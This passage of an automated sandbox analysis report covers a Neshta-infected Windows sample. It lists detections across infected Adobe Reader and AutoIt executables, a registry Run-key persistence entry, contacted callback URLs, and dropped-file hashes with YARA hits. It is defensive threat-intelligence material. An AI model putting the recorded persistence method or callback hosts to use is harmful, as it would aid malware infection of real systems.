          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Avira | W32/Neshta.A |
          | C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Avira | W32/Neshta.A |
          | C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Joe Sandbox ML | |
          | C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Joe Sandbox ML | |
          | C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 96% | ReversingLabs | Win32.Virus.Neshta |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 96% | ReversingLabs | Win32.Virus.Neshta |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 96% | ReversingLabs | Win32.Virus.Neshta |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 97% | ReversingLabs | Win32.Virus.Neshta |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | ReversingLabs | Win32.Virus.Neshta |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 91% | Metadefender | |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | ReversingLabs | Win32.Virus.Neshta |

          Unpacked PE Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 1.2.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A |
          | 7.1.elxhan.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 2.2.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 |
          | 17.2.NETSTAT.EXE.292ed78.2.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 5.2.svchost.com.400000.0.unpack | 100% | Avira | W32/Neshta.A |
          | 3.1.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 6.2.elxhan.exe.22b0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 3.2.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 7.2.elxhan.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 6.2.elxhan.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 |
          | 17.2.NETSTAT.EXE.328f834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 3.0.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 |
          | 2.0.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 |
          | 2.2.vi0EwpbUht.exe.2ff0000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 5.0.svchost.com.400000.0.unpack | 100% | Avira | W32/Neshta.A |
          | 6.0.elxhan.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 |
          | 2.2.vi0EwpbUht.exe.30e0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 1.0.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A |
          | 7.0.elxhan.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 |
          | 4.0.explorer.exe.1183f834.74.unpack | 100% | Avira | TR/Patched.Ren.Gen |

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | agileintelligence.coach | 34.102.136.180 | true | false | | unknown |
          | www.agileintelligence.coach | unknown | unknown | true | | unknown |

          Contacted URLs

          | Name | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|
          | http://www.agileintelligence.coach/xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== | false | Avira URL Cloud: safe | unknown |
          | www.personalizedyardsigns.com/xkcp/ | true | Avira URL Cloud: safe | low |

              URLs from Memory and Binaries

                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fonts.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.krexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sakkal.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown

                                        Contacted IPs

                                        Public

                                        IP:34.102.136.180
                                        Domain:agileintelligence.coach
                                        Country:United States
                                        ASN:15169
                                        ASN Name:GOOGLEUS
                                        Malicious:false

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:432848
                                        Start date:10.06.2021
                                        Start time:20:52:17
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 15m 8s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:vi0EwpbUht (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:24
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.spre.troj.evad.winEXE@15/122@1/1
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 40% (good quality ratio 37.6%)
                                        • Quality average: 75.5%
                                        • Quality standard deviation: 29.6%
                                        HCA Information:
                                        • Successful, ratio: 88%
                                        • Number of executed functions: 248
                                        • Number of non-executed functions: 257
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 20.50.102.62, 93.184.221.240, 51.103.5.159, 92.122.213.194, 92.122.213.247, 20.54.104.15, 20.54.7.98, 20.54.26.129, 23.57.80.111
                                        • Excluded domains from analysis (whitelisted): a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/432848/sample/vi0EwpbUht.exe

                                        Simulations

                                        Behavior and APIs

                                        Time      Type             Description
                                        20:53:08  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                        20:53:16  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                        20:53:20  API Interceptor  1x Sleep call for process: elxhan.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        Match:C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                                        Associated Sample Name / URL:
                                        • vOR0HQg11L.exe, Detection: malicious
                                        • svchost.exe, Detection: malicious
                                        • svchost.exe, Detection: malicious
                                        • 2018cf61_by_Libranalysis.exe, Detection: malicious
                                        • 41cDVt18DA.exe, Detection: malicious
                                        • FgTUClgDjQ.exe, Detection: malicious
                                        • ORDER-021406_pdf.jar, Detection: malicious
                                        • TT-INVI000000000.exe, Detection: malicious
                                        • explorer.exe, Detection: malicious
                                        • ITEMS_LIST.exe, Detection: malicious
                                        • DB0127718.exe, Detection: malicious
                                        • Itinerary.pdf.exe, Detection: malicious
                                        • Neshta virus.exe, Detection: malicious
                                        • 54nwZp1aPg.exe, Detection: malicious
                                        • qpFvMReV7S.exe, Detection: malicious
                                        • M7oBhU5A6m.exe, Detection: malicious
                                        • nqVQ8G1ylC.exe, Detection: malicious
                                        • mtsendmail.exe, Detection: malicious
                                        • mtloganalyser.exe, Detection: malicious
                                        • contig.exe, Detection: malicious
                                        Match:C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                                        Associated Sample Name / URL:
                                        • vOR0HQg11L.exe, Detection: malicious
                                        • svchost.exe, Detection: malicious
                                        • svchost.exe, Detection: malicious
                                        • 2018cf61_by_Libranalysis.exe, Detection: malicious
                                        • 41cDVt18DA.exe, Detection: malicious
                                        • FgTUClgDjQ.exe, Detection: malicious
                                        • ORDER-021406_pdf.jar, Detection: malicious
                                        • TT-INVI000000000.exe, Detection: malicious
                                        • explorer.exe, Detection: malicious
                                        • ITEMS_LIST.exe, Detection: malicious
                                        • DB0127718.exe, Detection: malicious
                                        • Itinerary.pdf.exe, Detection: malicious
                                        • Neshta virus.exe, Detection: malicious
                                        • 54nwZp1aPg.exe, Detection: malicious
                                        • qpFvMReV7S.exe, Detection: malicious
                                        • M7oBhU5A6m.exe, Detection: malicious
                                        • nqVQ8G1ylC.exe, Detection: malicious
                                        • mtsendmail.exe, Detection: malicious
                                        • mtloganalyser.exe, Detection: malicious
                                        • contig.exe, Detection: malicious

                                                                                                                        Created / dropped Files

                                                                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.278258254187173
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
                                                                                                                        MD5:E47F8A2ECDC2D4BFBBB6328B1391F1CC
                                                                                                                        SHA1:A633C3106A89C083014FC9F29D559B70E93D6D69
                                                                                                                        SHA-256:8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                                                                                                                        SHA-512:6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: vOR0HQg11L.exe, Detection: malicious
                                                                                                                        • Filename: svchost.exe, Detection: malicious
                                                                                                                        • Filename: svchost.exe, Detection: malicious
                                                                                                                        • Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious
                                                                                                                        • Filename: 41cDVt18DA.exe, Detection: malicious
                                                                                                                        • Filename: FgTUClgDjQ.exe, Detection: malicious
                                                                                                                        • Filename: ORDER-021406_pdf.jar, Detection: malicious
                                                                                                                        • Filename: TT-INVI000000000.exe, Detection: malicious
                                                                                                                        • Filename: explorer.exe, Detection: malicious
                                                                                                                        • Filename: ITEMS_LIST.exe, Detection: malicious
                                                                                                                        • Filename: DB0127718.exe, Detection: malicious
                                                                                                                        • Filename: Itinerary.pdf.exe, Detection: malicious
                                                                                                                        • Filename: Neshta virus.exe, Detection: malicious
                                                                                                                        • Filename: 54nwZp1aPg.exe, Detection: malicious
                                                                                                                        • Filename: qpFvMReV7S.exe, Detection: malicious
                                                                                                                        • Filename: M7oBhU5A6m.exe, Detection: malicious
                                                                                                                        • Filename: nqVQ8G1ylC.exe, Detection: malicious
                                                                                                                        • Filename: mtsendmail.exe, Detection: malicious
                                                                                                                        • Filename: mtloganalyser.exe, Detection: malicious
                                                                                                                        • Filename: contig.exe, Detection: malicious
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.3372362912074625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
                                                                                                                        MD5:10075707D5C79CDACFE09DEF9C6D4985
                                                                                                                        SHA1:7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
                                                                                                                        SHA-256:3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
                                                                                                                        SHA-512:C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: vOR0HQg11L.exe, Detection: malicious
                                                                                                                        • Filename: svchost.exe, Detection: malicious
                                                                                                                        • Filename: svchost.exe, Detection: malicious
                                                                                                                        • Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious
                                                                                                                        • Filename: 41cDVt18DA.exe, Detection: malicious
                                                                                                                        • Filename: FgTUClgDjQ.exe, Detection: malicious
                                                                                                                        • Filename: ORDER-021406_pdf.jar, Detection: malicious
                                                                                                                        • Filename: TT-INVI000000000.exe, Detection: malicious
                                                                                                                        • Filename: explorer.exe, Detection: malicious
                                                                                                                        • Filename: ITEMS_LIST.exe, Detection: malicious
                                                                                                                        • Filename: DB0127718.exe, Detection: malicious
                                                                                                                        • Filename: Itinerary.pdf.exe, Detection: malicious
                                                                                                                        • Filename: Neshta virus.exe, Detection: malicious
                                                                                                                        • Filename: 54nwZp1aPg.exe, Detection: malicious
                                                                                                                        • Filename: qpFvMReV7S.exe, Detection: malicious
                                                                                                                        • Filename: M7oBhU5A6m.exe, Detection: malicious
                                                                                                                        • Filename: nqVQ8G1ylC.exe, Detection: malicious
                                                                                                                        • Filename: mtsendmail.exe, Detection: malicious
                                                                                                                        • Filename: mtloganalyser.exe, Detection: malicious
                                                                                                                        • Filename: contig.exe, Detection: malicious
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.220006974675465
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
                                                                                                                        MD5:F447C4B446D5889225A9D9082145AD88
                                                                                                                        SHA1:A1A380F3D3402F243E1A213C39E969D2C24CA99E
                                                                                                                        SHA-256:C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
                                                                                                                        SHA-512:E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.356945716242827
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
                                                                                                                        MD5:DE64003856A8B74AEAF33E247AF9424B
                                                                                                                        SHA1:912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
                                                                                                                        SHA-256:A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
                                                                                                                        SHA-512:4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.486359083061706
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
                                                                                                                        MD5:D972E8BC4F221D69D9DF89999B74C311
                                                                                                                        SHA1:3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
                                                                                                                        SHA-256:8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
                                                                                                                        SHA-512:DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5232250585402545
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
                                                                                                                        MD5:F648557D5287EC8C3677DC5B57E1C6AC
                                                                                                                        SHA1:B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
                                                                                                                        SHA-256:647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
                                                                                                                        SHA-512:033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
